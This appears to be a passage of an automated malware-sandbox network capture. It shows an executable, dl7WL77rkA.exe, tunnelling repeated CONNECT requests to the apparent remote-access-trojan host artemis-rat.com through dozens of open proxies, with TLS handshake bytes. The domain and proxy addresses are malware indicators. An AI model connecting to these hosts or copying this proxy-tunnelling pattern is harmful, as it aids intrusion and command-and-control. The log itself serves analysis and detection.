                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.236263037 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            991192.168.2.552253171.247.244.10310803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.668704987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            992192.168.2.5526608.213.128.9066663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.669089079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            993192.168.2.55262637.235.53.20867893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.669666052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.988926888 CET339INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/4.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                                                            X-Squid-Error: TCP_RESET 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from proxy.wakoopa.com
                                                                                                                                                                                                                                                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 72 65 73 65 74
                                                                                                                                                                                                                                                            Data Ascii: reset


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            994192.168.2.552633202.83.102.8380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.674791098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.001502991 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            995192.168.2.552673173.249.29.24391233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.674926996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.995232105 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            996192.168.2.552641114.132.202.7880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.675188065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.205944061 CET84INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            997192.168.2.552138140.227.228.202101013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.675380945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.952500105 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            998192.168.2.552683121.159.146.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.675856113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            999192.168.2.5526893.127.62.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.679362059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.985160112 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.030159950 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c d0 f1 35 42 27 db 54 64 bd 94 2b 91 c4 78 7b 44 d9 b3 21 41 76 72 d8 a6 17 8f d5 31 e6 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: el5B'Td+x{D!Avr1*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.341869116 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 7f 62 91 65 62 01 36 02 36 b5 dc 59 bb 8b 33 43 07 32 26 1b fe 76 2c aa 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9beb66Y3C2&v,DOWNGRD0000*H010Uartemis-rat.com0240311014446Z260311014446Z010Uartemis-rat.com0"0*H0wwL%ci7>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.410028934 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 0d 32 ff 51 79 ee 12 8c 47 50 64 c7 c6 99 82 a9 95 c3 6e 45 a6 63 a0 34 5b 9a 89 ac be 44 bf 56 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 e0 b0 84 cd 24 6d d8 3d d6 a5 41 07 44 d8 7a cb 36 a6 a7 b6 40
                                                                                                                                                                                                                                                            Data Ascii: %! 2QyGPdnEc4[DV($m=ADz6@50
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.713902950 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 d1 82 9e 64 47 29 8e 98 02 b5 5e eb 53 14 a8 aa 4e 63 9e 8c 6d 4b 30 40 b5 7a 4b eb 30 7d 40 34 5f 75 33 cb 89 b7 ce bb
                                                                                                                                                                                                                                                            Data Ascii: (dG)^SNcmK0@zK0}@4_u3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1000192.168.2.552624143.64.8.2180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.686583996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1001192.168.2.550459103.76.148.16180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.689030886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.809940100 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1002192.168.2.552697207.180.234.220428233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.689294100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.405060053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355494022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1003192.168.2.55258645.251.231.11356783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.694314003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1004192.168.2.552655195.87.217.7533893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.696285963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1005192.168.2.550517212.110.188.220344093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.700536966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.701920033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.702198982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.702241898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1006192.168.2.552715188.119.99.210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.711199999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.405057907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355524063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.239506960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.014760971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.905059099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.679826021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1007192.168.2.552663186.211.6.13741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.712282896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1008192.168.2.55218682.223.121.72648713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.717142105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.701953888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.702203989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.702251911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1009192.168.2.552680154.239.9.8280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.721946955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.498673916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.702035904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889703989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092876911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389547110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.592955112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1010192.168.2.55271958.234.116.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.761147022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1011192.168.2.55063823.161.96.132803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.761147022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
